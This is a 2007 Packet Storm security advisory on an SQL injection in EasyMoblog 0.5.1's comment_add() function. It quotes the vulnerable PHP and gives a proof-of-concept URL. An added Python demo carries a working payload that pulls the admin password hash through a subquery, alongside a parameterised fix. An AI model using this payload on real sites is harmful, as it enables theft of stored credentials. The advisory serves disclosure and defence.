Sql_Vulnerability_EasymoBlog-2.txt

2007-02-06T00:00:00
ID PACKETSTORM:54178
Type packetstorm
Reporter Tal Argoni
Modified 2007-02-06T00:00:00

Description

·= Security Advisory =·  
  
Issue: SQL injection vulnerability in EasyMoblog by Umberto Caldera.
Discovered Date: 30/01/07  
Author: Tal Argoni, LegendaryZion. [talargoni at gmail.com]  
Product Vendor: http://sourceforge.net/project/showfiles.php?group_id=88633  
Ver: easymoblog-0.5.1  
Details:  
  
EasyMoblog is prone to an SQL injection vulnerability.
The flaw is in the comment_add() function, which concatenates the comment's
post_id into an INSERT statement without validating or escaping it, while the
other fields are passed through addslashes(). add_comment.php fills post_id
from the GET parameter "i" or the POST parameter "post_id", so either one
carries the injection: a single quote in that value terminates the string
literal and everything after it is parsed as SQL.

comment_add() is defined in "libraries.inc.php" and is called from
"add_comment.php".
  
  
Contents of libraries.inc.php:
---------------------------------
...

function comment_add ($comment) {
    ...
    // The first three values are escaped with addslashes(); post_id is
    // neither escaped nor cast to an integer, so a quote inside it closes
    // the literal and the remainder of the value is parsed as SQL.
    $query = "
        insert into ".CFG_MYSQL_TABPREFIX."comments
        (comment_author,comment_author_email,comment_text,comment_added,post_id)
        values (
            '".addslashes($comment['comment_author'])."',
            '".addslashes($comment['comment_author_email'])."',
            '".addslashes($comment['comment_text'])."',
            '".time()."',
            '".$comment['post_id']."'
        )
    ";
    $res = mysql_query($query);
    ...
  
...  
  
Contents of add_comment.php:
---------------------------------
...

// post_id is copied straight from the request (POST "post_id" first,
// then GET "i") with no check that it is numeric.
$form['post_id'] = '';
if(isset($_POST['post_id'])) $form['post_id'] = $_POST['post_id'];
elseif(isset($_GET['i'])) $form['post_id'] = $_GET['i'];
else exit();
...

// Once the (elided) form checks pass, the raw post_id reaches comment_add().
if (count($errors) == 0) {
    $comment = $form;

    $comment = comment_add ($comment);
    Header ("Location: list_comments.php?i=".$comment['post_id']);
    exit();
...
  
  
  
  
Proof Of Concept / Exploitation URL:
http://www.example.com/easymoblog/add_comment.php?i='[SQL]

The same value can be sent as the POST parameter "post_id" instead of the GET
parameter "i". The quote closes the post_id literal and [SQL] is appended to
the INSERT statement. Two practical caveats: PHP's mysql_query() executes a
single statement, so the injected text has to extend the INSERT itself (for
example additional VALUES rows or a subquery) rather than start a second
statement; and if the server runs with magic_quotes_gpc enabled the quote is
escaped before it reaches the query and this request fails.

Successful exploitation allows execution of attacker-controlled SQL with the
privileges of the application's database user. This can be used to read
passwords, user accounts and other stored data, to cause a denial of service,
and more.
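The following is an added example, not EasyMoblog code. It rebuilds the
comment_add() query the same way the vulnerable function does and runs it
against an in-memory SQLite database standing in for MySQL, to show how a
single INSERT (no stacked queries) can still be turned into data theft, and
what the fix looks like. The table prefix "emb_", the "emb_users" table, its
columns and contents, and the payload are all constructed for this demo; they
are assumptions, not EasyMoblog's real schema.

```python
"""
Added example (not EasyMoblog code): reproduces comment_add()'s query
construction against in-memory SQLite and shows the hardened form.
Table prefix, users table and its contents are constructed assumptions.
"""
import re
import sqlite3

TAB_PREFIX = "emb_"  # stands in for CFG_MYSQL_TABPREFIX (assumed value)

# Constructed payload for the "i" / "post_id" parameter. The leading quote
# closes the post_id literal; the rest adds a second VALUES row whose
# comment_text is a scalar subquery, so the stolen value becomes readable
# on list_comments.php. One statement suffices, matching mysql_query().
PAYLOAD = ("1'),('x','x@example.com',"
           f"(SELECT user_pass FROM {TAB_PREFIX}users WHERE user_name='admin'),'0','1")

BENIGN_COMMENT = {
    "comment_author": "bob",
    "comment_author_email": "bob@example.com",
    "comment_text": "nice post",
}


def setup_db():
    """Fresh database: a comments table shaped like the INSERT in comment_add()
    and a hypothetical users table holding one value worth stealing."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE {TAB_PREFIX}comments (
            comment_id INTEGER PRIMARY KEY,
            comment_author TEXT, comment_author_email TEXT, comment_text TEXT,
            comment_added INTEGER, post_id INTEGER);
        CREATE TABLE {TAB_PREFIX}users (user_name TEXT, user_pass TEXT);
        INSERT INTO {TAB_PREFIX}users VALUES ('admin', 'constructed-hash');
    """)
    return conn


def escape(s):
    """Stand-in for PHP addslashes(). addslashes() backslash-escapes for MySQL;
    SQLite only knows doubled quotes, so that is used here. The point holds:
    three fields are escaped, post_id never is."""
    return s.replace("'", "''")


def build_query_vulnerable(comment, now=1170720000):
    """Same string assembly as comment_add(): post_id is concatenated raw."""
    return (
        f"INSERT INTO {TAB_PREFIX}comments "
        "(comment_author,comment_author_email,comment_text,comment_added,post_id) "
        "VALUES ("
        f"'{escape(comment['comment_author'])}',"
        f"'{escape(comment['comment_author_email'])}',"
        f"'{escape(comment['comment_text'])}',"
        f"'{now}',"
        f"'{comment['post_id']}')"
    )


def stored_comment_texts(conn):
    rows = conn.execute(
        f"SELECT comment_text FROM {TAB_PREFIX}comments ORDER BY comment_id"
    ).fetchall()
    return [r[0] for r in rows]


def run_vulnerable(post_id):
    """Submit one comment through the vulnerable path; return stored comment_text."""
    conn = setup_db()
    comment = dict(BENIGN_COMMENT, post_id=post_id)
    conn.execute(build_query_vulnerable(comment))  # one statement, like mysql_query()
    return stored_comment_texts(conn)


def comment_add_fixed(conn, comment, now=1170720000):
    """Hardened version: post_id must be a decimal integer and every value is
    bound as a parameter, so no input can change the statement's shape."""
    post_id = str(comment["post_id"])
    if not re.fullmatch(r"[0-9]+", post_id):
        raise ValueError("post_id must be a positive integer")
    conn.execute(
        f"INSERT INTO {TAB_PREFIX}comments "
        "(comment_author,comment_author_email,comment_text,comment_added,post_id) "
        "VALUES (?,?,?,?,?)",
        (comment["comment_author"], comment["comment_author_email"],
         comment["comment_text"], now, int(post_id)),
    )


def run_fixed(post_id):
    """Submit one comment through the fixed path; return (accepted, stored texts)."""
    conn = setup_db()
    try:
        comment_add_fixed(conn, dict(BENIGN_COMMENT, post_id=post_id))
    except ValueError:
        return False, stored_comment_texts(conn)
    return True, stored_comment_texts(conn)


if __name__ == "__main__":
    print(run_vulnerable(PAYLOAD))  # ['nice post', 'constructed-hash']
    print(run_fixed(PAYLOAD))       # (False, [])
    print(run_fixed("7"))           # (True, ['nice post'])
```

The multi-row VALUES plus scalar-subquery shape works the same way in MySQL,
with the usual restriction that the subquery may not read from the table being
inserted into. Rejecting non-numeric post_id values is the minimal fix for
this code path; binding parameters (mysqli or PDO prepared statements in PHP)
is the fix that also covers the addslashes() fields.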
  
  